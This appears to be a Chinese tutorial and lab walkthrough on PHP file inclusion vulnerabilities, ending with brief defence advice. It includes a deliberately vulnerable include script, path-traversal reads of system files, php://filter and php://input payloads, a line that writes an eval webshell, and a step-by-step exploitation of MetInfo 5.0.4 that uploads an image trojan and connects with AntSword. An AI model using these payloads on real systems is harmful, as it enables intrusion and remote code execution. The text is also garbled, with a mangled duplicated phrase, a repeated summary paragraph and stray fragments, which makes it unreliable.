程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。
程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。
几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的Web 应用中居多,在JSP/ASP/ASP.NET 程序中比较少。
PHP 提供了四个文件包含的语句,四个语句之间略有不同。
语句 | 区别 |
---|---|
include() | 多次包含,多次执行; 如果包含失败,脚本产生警告,继续运行。 |
include_once() | 多次包含,一次执行; 如果包含失败,脚本产生警告,继续运行。 |
require() | 多次包含,多次执行; 如果包含失败,脚本产生错误,结束执行。 |
require_once() | 多次包含,一次执行; 如果包含失败,脚本产生错误,结束执行。 |
语句具体介绍:PHP: Hypertext Preprocessor。
基础代码
$fp = "../phpinfo.php";
include($fp);
?>
访问该文件后页面显示效果
文件包含是PHP 的基本功能之一,有本地文件包含与远程文件包含之分。简单来说,本地文件包含就是可以读取和打开本地文件,远程文件包含就是可以远程(方式)加载文件。可以通过php.ini 中的选项进行配置。
allow_url_fopen = On/Off # 通过远程方式打开文件
allow_url_include = On/Off # 通过远程方式包含文件
默认第二个选项是关闭的
为了后面的实验方便,修改其配置。
配置方式:找到php配置文件php.ini,修改一下参数为On。
// file-include.php
<?php
$fp = @$_GET['filepath'];
@include $fp;
//或者
include($fp);
?>
本地文件包含(Local File Include,LFI)通过本地路径访问到的文件。
?filepath=../phpinfo.php
远程文件包含(Remote File Include,RFI),通过远程路径访问到的文件。
?filepath=http://192.168.188.183/phpinfo.php
原理
PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。
特点
无视文件扩展名读取文件内容。
?filepath=./a.jpg
无条件解析PHP 代码,为图片木马提供了出路。
?filepath=a_yjh_info.jpg
实验:将phpinfo.php文件的后缀名修改为png图片格式,然后再次访问。
?filepath=../phpinfo.php.png
文件读取执行的时候php源码没有执行
文件包含执行的时候php源码执行了
区别如下:
综上所述,文件包含漏洞和文件读取漏洞都是安全漏洞,但主要区别在于文件包含漏洞是通过攻击者构造恶意的文件路径或参数来执行任意文件包含,而文件读取漏洞则是未对文件路径进行严格验证或限制,导致攻击者可以读取不应公开的敏感文件。
蚁剑直接连接
http://192.168.188.183/MetInfo_5.0.4/about/index.php?fmodule=7&module=../upload/file/wuhu.jpg
利用文件包含漏洞,也可以读取敏感文件。前提条件:
具体方法:
# 相对路径
?filepath=../../../../../../windows/system32/drivers/etc/hosts
# 绝对路径
?filepath=c:/windows/system32/drivers/etc/hosts
# 使用php 封装协议
?filepath=file://c:/windows/system32/drivers/etc/hosts
php伪协议file
封装协议 | 说明 |
---|---|
file:// | 访问本地文件系统 |
http:// | 访问 HTTP(s) 网址 |
ftp:// | 访问 FTP(s) URLs |
php:// | 访问各个输入/输出流(I/O streams) |
zlib:// | 压缩流 |
data:// | 数据(RFC 2397) |
glob:// | 查找匹配的文件路径模式 |
phar:// | PHP 归档 |
ssh2:// | Secure Shell 2 |
rar:// | RAR |
ogg:// | 音频流 |
expect:// | 处理交互式的流 |
利用php://fileter 读取:
?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]
读取错误
PD9waHANCi8vIGZpbGUtaW5jbHVkZS5waHANCg0KJGZwID0gQCRfR0VUWydmaWxlcGF0aCddOw0KQGluY2x1ZGUgJGZwOw==
利用条件
POST /file-include/include.php?filepath=php://input HTTP/1.1
Host: 192.168.188.183
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9lc0vlnggvo7kogh6j01a3582
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 18
或者
条件:
写shell
fputs(fopen("shell.php",'w'),'=@eval($_REQUEST[777]);phpinfo();?>')?>
<?php file_put_contents('shell.php','')?>
利用
http://192.168.188.183/file-include/shell.php
Apache日志
Nginx日志
SSH日志
邮件日志
产生文件包含的文件为/about/index.php
这里的$module值存在文件包含。
/about/index.php?fmodule=7&module=[filePath]
漏洞分析
尝试输出$module。在源码中添加echo代码,查看页面显示效果。
输出结果如下:
查看module.php文件
搜索 f m o d u l e 变量,发现只有当 fmodule 变量,发现只有当 fmodule变量,发现只有当fmodule!=7 时,会对$module进行验证。
提交参数【?fmodule=7&module=c://windows/system32/drivers/etc/hosts】,此时我们已经改变了$module的值,其值为hosts文件的绝对路径。
?fmodule=7&module=c://windows/system32/drivers/etc/hosts
读取成功
文件包含的危害之一就是文件读取。
如何证明该漏洞是文件包含漏洞,如果在执行命令后PHP代码执行了,那么就是文件包含漏洞。
如下页面显示成功而不是show.php源代码,php代码执行,说明是文件包含漏洞。
登录网站
用户名:wuhu
密码:123456
寻找文件功能上传点
上传图片木马
提交成功
直接使用蚁剑进行连接
http://192.168.188.183/MetInfo_5.0.4/upload/file/wuhu.jpg
发现无法连接
使用文件包含
然后使用蚁剑进行连接
http://192.168.188.183/MetInfo_5.0.4/about/index.php?fmodule=7&module=../upload/file/wuhu.jpg
可以读取敏感文件
../../../../../../windows/system32/drivers/etc/hosts
读取PHP源码
http://192.168.188.183/MetInfo_5.0.4/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php
base64解码
执行PHP 命令
找到对应的数据包
转换为POST请求
转换为POST提交方式后,将fmodule值放在URL中进行提交
修改module的值为php://input
然后在后面添加php代码即可
open_basedir = C:\software\phpstudy_pro\WWW
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web安全漏洞,它允许攻击者通过构造恶意请求,将恶意代码或者非授权文件包含到应用程序中执行。下面将从漏洞描述、漏洞场景、漏洞原理、漏洞危害、漏洞验证、利用方法和漏洞防御几个方面详细解释文件包含漏洞。
综上所述,文件包含漏洞可以导致攻击者读取、执行或包含不受控制的文件,进而对应用程序和系统造成严重风险。为了防止该漏洞,开发人员需要进行充分的输入验证和过滤,限制文件访问权限,并配置安全策略来防御此类攻击。
行文件。
2. 利用方法: 攻击者可以通过以下方法利用文件包含漏洞:
综上所述,文件包含漏洞可以导致攻击者读取、执行或包含不受控制的文件,进而对应用程序和系统造成严重风险。为了防止该漏洞,开发人员需要进行充分的输入验证和过滤,限制文件访问权限,并配置安全策略来防御此类攻击。